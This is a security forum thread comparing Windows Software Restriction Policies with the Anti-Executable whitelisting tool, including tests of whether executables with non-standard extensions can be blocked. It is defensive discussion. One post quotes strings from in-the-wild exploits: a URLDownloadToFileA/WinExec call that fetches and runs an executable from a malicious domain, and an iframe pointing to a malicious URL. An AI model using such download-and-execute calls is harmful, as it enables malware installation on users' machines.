Software Restriction Policy vs Antiexecutable

thank you for testing this rmus

one quick question though, do you know what SRP rules SpikeyB has in place to thwart malicious scripts? i'd love to know so i can implement them too (possibly other SRP users would also be interested).

 

So, to the pros and cons.

-AE can block regardless of extension, so can SRP.
-AE only blocks executables in the strict sense, SRP can block more, by file extension + ?
-AE can block the download of anything binary, SRP can't.
-AE can block changes to allowed programs. ARP with LUA also achieves this if configured accordingly, since a limited user can't write to the folders where the allowed programs reside. I expect this to change according to configuration.
-SRP is flexible, AE pretty straight forward- On/Off (v2 only, v3 will change this).
-SRP can be much more powerful (hopefully i'm reading this right):

 

A random opinion founded on what happens on my computer.
I wish SRP-users good luck. SRP is a true labyrinth that requires alot of playtime. A challenge for knowledgeable users, certainly not for average users.
I keep AE in my frozen system, which is effective enough and doesn't require so much playtime with ups and downs and getting lost all the time. I might even make my own system unusable.

 

There are two different issues that are getting lumped together: whether you can launch an executable with nonstandard extensions from Explorer vs. whether software can launch executable code with nonstandard extensions using the Windows API. The first issue has been explored with tests, but I'm not sure about the second issue. I'm pretty sure I've seen the execution of .tmp files by other executable files, usually during setup (discovered via HIPS execution prompts). I don't believe there's anything special about the .tmp extension either. It could have been any extension whatsoever.

I'll try to find or write something to test the second issue. However, look again at the 3rd screenshot at http://blog.threatfire.com/2008/06/tracking-coreflood-from-shellcode.html. You can see execution of code with a nonstandard extension via the Windows API.

 

Here are some ways that malware might be able to initially execute with LUA+properly configured SRP:
a) Buffer overflow when exposed to malicious data. If the buffer overflow happens in highly privileged code, the system core itself can be comprised. See here for a vulnerability that was exploited in the wild.
b) Malicious scripts in web browsers, pdf files, Office files, etc.
c) Scripts written for 3rd-party script languages that have been installed.

Here are some ways that malware that's already running might be able start automatically or otherwise compromise your system with LUA+properly configured SRP:
a) Programs already installed outside of the normal locations can possibly be modified. Some programs install in non-standard places and don't give an option to install in a normal place.
b) Improperly configured permissions on files or registry entries. This seems to be not rare in 3rd party programs, even security programs. Even if you check for this and correct any problems, there is the possibility that you could install a program later that has improperly configured permissions.
c) Some security programs can be terminated by merely sending a terminate windows message. Vista introduced integrity levels to try to mitigate situations such as this. Some security programs run as non-privileged code and are easily terminated or modified.
d) Some ways that an attack can further comprise a XP system are mentioned here. XP doesn't have Vista's integrity levels.

Even in Vista there are some tradeoffs:

e) ActiveX repurposing.

f) There are some autostart registry locations that can be changed from a LUA. This issue and how to fix it has been discussed by others.

 

Trust me, I would any day take SRP over pesky and mostly buggy resource hogging HIPS. I am a long time LUA user and have also recently become a SuRun fan as well. If SRP worked on my system it would have truly been fantastic combined with Avira that I use.

 

Maybe some or all of these are just cases of people using Explorer configured to not show extensions for known files types, or .tmp files that are renamed to .dll, .exe, etc, before use. Let's hope so, but here goes....

What are the symptoms of a malicious .tmp?

Suspect .tmp process

The worm creates a randomly named .dll file in the \%Temp% directory with a .tmp extension and injects it into the explorer.exe process

As the virus installs a dropper with a TMP extension on the hard drive, it is recommended to add the TMP extension to the list of scanned extensions for both on-demand and real-time scanners of F-Secure Anti-Virus.

A painfully high number of incidents have been occuring over the past couple of days in India, Thailand and Greece involving a bot/mailer that is installed by a "aow4.tmp", "aowc.tmp", "aow28.tmp"

The following NOD32 loading modules will be created: base module (nod32.000), archives support module (nod32.002), advanced heuristics module (nod32.003) and packed worm scanner module (nod32.004).

The vulnerability has been confirmed in NOD32 for Windows NT/2000/2003/XP Trial Version 2.5 (with nod32.002 version 1.033 build 1127).

After patching, it makes a copy of tmp26.tmp into tmp27.tmp and executes tmp26.tmp through winexec API.

 

You are welcome.

In a note to me a few months ago he said that he has wscript.exe disabled -- by that, he explained, it is not on the White List.

Regarding this thread topic: Keep in mind that Anti-Executable has just one purpose in life: to keep unauthorized binary executables from downloading/installing onto the system. In every in-the-wild remote code execution exploit I've tested, it didn't matter what the trigger mechanism was, or what the file extension was, whether a call in a malicious file:

Code:

A_urlmon.dll_URLDownloadToFileA_WinExec_http://intimatephotoalbum.net/[b]web.exe[/b]

or a call within a web page html code:

Code:

i frame src="http://www.vevdqimkcm.info/c/2141/[b]counter21.php[/b] 

In any case, the payload failed to execute.

For exploits where the code does something else besides call for a binary executable,
the user will have to employ something besides AE for prevention.


----
rich

 

Good news!

I found a VBScript that demonstrates that it is indeed possible to run an executable with non-standard extensions. I successfully ran an executable with .tmp extension and an executable with .jnk extension. That's not the good news. The good news is that SRP configured as suggested blocked the execution of the executable with the non-standard extension, at least in this case!

I'm not sure if I'm allowed to post the VBScript here though? If not, I'll send it via PM to those who want it.

 

woot! thanks for the test and go srp!

if you are not allowed to post it, can you please send it to me by PM? it's not destructive is it?

 

Can you post a screen shot of the message that SRP shows?

thanks,

-----
rich

 

There was none. The program with the non-standard extension in the script just didn't run with SRP on.

 

Can anyone think of scenarios where that is the case? The only 1 I remember is flash's ability to access the TCPIP stack and send instructions to your router to try default passwords.

 

By the way, this shows that for those of you who run resident anti-malware file scanners, that you should configure the anti-malware file scanner to scan all files, not just DLL, EXE, etc.

 

Could the two of you whom I have already sent the VBScript verify in this thread that my results are correct? I tested with SRP but not LUA.

 

In another thread I mentioned that I'm compiling a list of any type of in-the-wild attack using such a scenario (not calling for a binary executable)

I asked a couple of Handlers at sans.org, and a few others who keep up with malware. My list so far: 1 that I found on my own (Oracle Database exploit).

Now with yours, I have two.

The lesson for me is that despite the many reports of vulnerabilities and PoC showing how code can be manipulated, the vast majority of attacks attempt to install a binary payload. I've suspected this for a long time. They are pretty easy to test if you can get the link before it's taken down. Or if you don't have the particular application that is being exploited (Safari browser; Quicktime; Messenger)

This being the case, one's security setup doesn't have to be sophisticated at all. As the LUA and SRP threads have shown, you can be pretty well protected against the most commonly seen exploits in the wild.


----
rich

 

I don't have those, but here is AE.

First, I was going to ask if those who tested (besides you, of course) could tell from the code
what is actually calling for the executable? Answer below:



_________________________________________________

The file is an actual trojan which used the .php file extension.

 

PM Sent.

Very good heads up and attention to these TYPE details MrBrian.

EASTER

 

Very interesting reading. Thanks for taking the time to compile the list.

An old exploitation of .tmp files was in the early days of MS Word macro viruses.

Some basics for those who may not know.

When you d-click on a file, Windows searches the Registry HKC_Root for the application associated with the file extension.
On my computer, I have .rtf associated with MS Word, and here is the Registry entry telling MS Word to open the file:


________________________________________________

If you d-click on a .tmp file, theoretically the "Open With" dialog box will display for you to choose
which application to open the file, because .tmp is not associated with anything, hence, the generic icon:


________________________________________________

So, what's going on here?


________________________________________________

It turns out that you can save a MS Word file with any file extension, and Word will "recognize" it as a .doc file because of the file information contained in the file. In this case, I created a Macro to display each time the document is opened. You can imagine what someone could do with this macro code.

It was a lesson that dispelled the notion that a file extension could be depended upon to tell you what the file is. In the college where I worked, students used to play jokes by including a silly AutoOpen macro with their files. Then Word started including Macro alert protection.

Opening Word documents in a text editor is a useful preventative measure for MSWord exploits --
in this case, a double extension using .scr -- which contains executable code,
for the document will not load:


____________________________________________________________________


----
rich

 

......and rarely given serious consideration anymore due to the bug in ScriptDefender's Uninstall which the remedy by Doug Knox in returning defaults again on an uninstall works perfect, ScriptDefender is the only of it's type i seen that ABORTS/INTERCEPTS scripting of this nature, be they vbs, reg, js, etc.

I've gone back to utilizing it because it is useful against malicious scripts.

EASTER

 

i can't get it to run. even though i've removed wscript.exe, cscript.exe, and .vbs from my blocked list in SRP. windows pops up with an error message saying the file won't be allowed to run and i should contact my administrator.

 

I'll echo that, and I was going to ask that if you've observed this kind of script used in any current attacks in the wild?


----
rich

 

In the VBScript I sent, you need to modify the contents of the strExe variable to point to an executable of your choice.

 

Did you put the script within \program files or \windows? If not, you need to. Otherwise SRP will block the script itself.

 

How does ScriptDefender determine that a script is malicious?


----
rich